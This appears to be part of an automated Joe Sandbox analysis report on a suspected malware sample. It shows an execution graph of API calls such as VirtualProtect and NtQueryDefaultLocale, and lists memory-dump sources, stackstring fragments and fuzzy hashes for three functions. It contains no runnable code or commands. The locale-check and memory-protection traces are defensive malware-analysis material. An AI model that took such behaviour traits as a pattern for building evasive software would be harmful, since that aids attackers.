                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:0.6%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:23
                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                  execution_graph 38597 422d22 38598 422d5f 38597->38598 38600 422d53 ExitProcess 38597->38600 38602 422d7f 38598->38602 38603 422db8 ExitProcess 38602->38603 38605 419df2 38606 419e2f NtQueryDefaultLocale 38605->38606 38608 419ef5 38606->38608 38611 41a0b7 38606->38611 38614 419f21 21 API calls 38608->38614 38615 41a470 21 API calls 38611->38615 38616 40b3d5 VirtualProtect 38617 40b40f 38616->38617 38618 40b4ce VirtualProtect 38617->38618 38619 40b500 38618->38619 38620 41b41f 38621 41b456 NtQueryDefaultLocale 38620->38621 38624 41b4b7 38621->38624 38627 41b6d8 38624->38627 38625 41b6d0 38626 422e02 ExitProcess 38625->38626 38628 41b6ec 38627->38628 38629 422e02 ExitProcess 38628->38629

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00409037 Relevance: 49.4, APIs: 1, Strings: 27, Instructions: 420COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2391131205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391105104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391284217.0000000000525000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391349592.00000000005A8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391380900.00000000005AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391404940.00000000005AB000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391432973.00000000005B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391461087.00000000005CA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391511512.0000000000633000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391548094.0000000000664000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391548094.0000000000666000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391599958.000000000066A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391624250.0000000000673000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391649923.0000000000676000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391684094.000000000067D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391710427.0000000000680000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391734940.0000000000689000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391763358.000000000068E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391803437.00000000006BC000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391828783.00000000006C0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_kJHbagG0C4H5BEyYJQeInLfF.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                                                                                                                                                                                                                  • API String ID: 0-829924176
                                                                                                                                                                                                                                  • Opcode ID: fa7f2ea7d06a1c11f4c3c7b418b5ab40c488cf3c469cda7af914d479c4175b81
                                                                                                                                                                                                                                  • Instruction ID: 375ac688da5934b688f4bcb78b3944943b62ad60df6e06d8cd5dc98f8d8c3c95
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7f2ea7d06a1c11f4c3c7b418b5ab40c488cf3c469cda7af914d479c4175b81
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19F135B2D082A89AF7208625DC447DA7BB5EF91304F0441FAC44D67282D67E5FC6CBA7
                                                                                                                                                                                                                                  Function 00409009 Relevance: 49.4, APIs: 1, Strings: 27, Instructions: 402COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2391131205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391105104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391284217.0000000000525000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391349592.00000000005A8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391380900.00000000005AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391404940.00000000005AB000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391432973.00000000005B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391461087.00000000005CA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391511512.0000000000633000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391548094.0000000000664000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391548094.0000000000666000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391599958.000000000066A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391624250.0000000000673000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391649923.0000000000676000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391684094.000000000067D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391710427.0000000000680000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391734940.0000000000689000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391763358.000000000068E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391803437.00000000006BC000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391828783.00000000006C0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_kJHbagG0C4H5BEyYJQeInLfF.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                                                                                                                                                                                                                  • API String ID: 0-829924176
                                                                                                                                                                                                                                  • Opcode ID: 5add19f7e8998525be6cf22f90b47c0ff67255d3f501afb9e6df6ed236ec3386
                                                                                                                                                                                                                                  • Instruction ID: e23a1f506a077f573dc430d5e8b10672cd4dc9a3115a4b21629f4a620024b0ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5add19f7e8998525be6cf22f90b47c0ff67255d3f501afb9e6df6ed236ec3386
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EF145B2D082A88AF7208A25DC447DA7BB5EF51300F0441FAC44D67282D67E5FC6CBA7
                                                                                                                                                                                                                                  Function 0040A04B Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 249COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2391131205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391105104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391284217.0000000000525000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391349592.00000000005A8000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391380900.00000000005AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391404940.00000000005AB000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391432973.00000000005B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391461087.00000000005CA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391511512.0000000000633000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391548094.0000000000664000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391548094.0000000000666000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391599958.000000000066A000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391624250.0000000000673000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391649923.0000000000676000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391684094.000000000067D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391710427.0000000000680000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391734940.0000000000689000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391763358.000000000068E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391803437.00000000006BC000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2391828783.00000000006C0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_kJHbagG0C4H5BEyYJQeInLfF.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 3849$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                  • API String ID: 0-4127283393
                                                                                                                                                                                                                                  • Opcode ID: 1b4a806f4aed8c27872cd381f6375e33a2eebbe9e1d627def979598e3a4133b5
                                                                                                                                                                                                                                  • Instruction ID: ad54936cff26b5a14aaa063f3c186eac5bd1450ecfe14e0f19b3fdc36f8b754a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b4a806f4aed8c27872cd381f6375e33a2eebbe9e1d627def979598e3a4133b5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4A102B1D042688AE710CB24DC407EA7BB5EF95304F0481FAC44DA7281D67E5FD5CB9A